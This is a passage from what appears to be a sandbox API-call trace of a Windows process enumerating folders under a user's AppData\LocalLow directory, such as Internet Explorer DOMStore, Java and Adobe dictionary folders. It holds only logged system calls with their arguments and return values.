HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0148.356] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.356] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.357] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.361] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.362] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.362] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x21b074b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21b074b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.363] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.363] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.363] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.363] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.364] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.364] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.364] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x21b9fa30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21b9fa30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.365] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.365] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.365] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x21bc5b90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21bc5b90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.367] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.367] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.367] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x21c37fb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21c37fb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.367] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.367] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.367] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.369] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.369] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.369] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.371] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.372] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.372] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x21c5e110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21c5e110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.372] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.372] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.372] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x21c84270, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21c84270, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.373] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.373] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.373] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.373] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.373] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.373] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x21caa3d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21caa3d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.374] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.374] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.374] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.375] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.375] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.375] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.375] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.375] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.375] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.376] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.376] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.376] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.376] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.377] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.377] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.377] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.378] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.378] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.378] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.379] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.379] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.379] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.380] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.380] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.380] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.380] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.380] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.380] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.380] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.380] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.380] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.381] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.381] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.381] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.383] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.384] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.384] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, 